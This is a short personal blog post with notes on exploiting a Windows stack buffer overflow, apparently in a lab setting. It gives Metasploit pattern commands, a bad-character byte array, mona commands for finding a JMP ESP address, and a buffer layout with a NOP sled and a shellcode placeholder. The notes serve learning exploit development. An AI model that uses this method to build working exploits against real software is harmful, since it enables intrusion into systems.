Buffer Overflow

Buffer over flows are not simple. this post is my own notes if it makes sense feel free to use it.

Stack Overflow

Find Vulnerable program and possibly starting Skelton script. Attach program to Olle Debugger, and send payload to crash program. Now the fun starts.

Step 1: Finding and controlling EIP

use pattern_create.rb to generate code.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3500

Step-2 Use pattern_offset to find exact location on EIP

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606

Replace 4 bytes after offset with B and rest of the code with C and re check code

Step-3: finding badchars

After EIP send all bad chars and step through one by one. it should not take long and do not rely on any other methods.

badchars = (
“\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10”
“\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20”
“\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30”
“\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40”
“\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50”
“\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60”

“\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70”
“\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80”
“\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90”
“\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0”
“\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0”
“\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0”
“\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0”
“\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0”
“\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0”
“\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff” )

Step-4: Finding JMP or equivalent

once we control EIP we then need to find a place where EIP points so our code can jump there, keeping DEP and ASLR in mind.

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >

Step-5: Mona

Use !mona modules to see all available modules.

click on m icon to load memory modules and see one for identified modules. if there is DEP and ASLR present we need to look for .text or else we can use any registry.

then use Nasm shell to obtain location of JMP ESP and use mona to find JMP instruction in required file.

!mona find -s “\xff\xe4” -m slmfc.dll

Use extreme caution as mona discriminates forward and backward slash

double verify with code section.

and finally use that as 4 bytes based on little endian or big endian

5F4A358F becomes \x8f\x35\x4a\x5f for little endian

then use following formule

buffer = ‘A’2606 + ‘\x8f\x35\x4a\x5f’ + ‘\x90’*16 + shellcode + ‘C’*(3500-351-2606-4-16)

i will add more as i go along

0 Comments

Leave a Reply

Your email address will not be published.